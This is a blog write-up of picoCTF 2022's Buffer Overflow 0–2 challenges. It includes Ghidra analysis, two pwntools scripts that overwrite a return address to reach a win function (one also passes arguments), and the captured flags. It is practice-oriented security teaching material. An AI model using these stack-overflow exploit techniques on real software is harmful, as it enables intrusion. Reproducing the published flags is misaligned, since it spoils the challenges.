Written by
ZyphenSVC

Share this post!

Tweet

← ../

Buffer Overflow - picoCTF 2022 Writeup

April 12, 20221 min read

Buffer Overflow 0

Spam A's

picoCTF{ov3rfl0ws_ar3nt_that_bad_8ba275ff}

Buffer Overflow 1

Vuln

When opening up the file in ghidra we have three functions we need to keep track of, main, vuln, and win.

We load into the vuln function from main, in which we see what is above.

We seem to have to overflow the buffer for local_2c, then set it to the win address to get the flag.

Luckily, ghidra variables are set in a way that the variable names are equivalent to the amount of space the variable takes. In this case, 2c space in hex.

from pwn import *

bin = context.binary = ELF("./vuln")

#p = process(bin.path)
p = remote("saturn.picoctf.net", 62247)

payload = b""
payload += 0x2c*b"A"
payload += p64(bin.symbols["win"]) + b"\n"
p.sendline(payload)
p.interactive()

Using the script above, we got the flag

picoCTF{addr3ss3s_ar3_3asy_c76b273b}

Buffer Overflow 2

This time it is the same idea as before, however we have a problem.

Win

We have to add arguments to the win function to able to "win".

We are able to do this by packing the negative hex variables after calling the win function.

This replaces param1 and param2.

from pwn import *

bin = context.binary = ELF("./vuln2")

#p = process(bin.path)
p = remote("saturn.picoctf.net", 55779)

payload = b""
payload += 0x70*b"A"
payload += p32(bin.symbols["win"])
payload += asm("nop")*4
payload += pack(-0x35010ff3)
payload += pack(-0xff20ff3)
p.sendline(payload)
p.interactive()

This is the flag.

picoCTF{argum3nt5_4_d4yZ_31432deb}


Published April 12, 2022, by ZyphenSVC.

If you enjoyed the post, consider sharing it!

Tweet


Copyright © 2023 Sriaditya Vedantam. Site source on GitHub.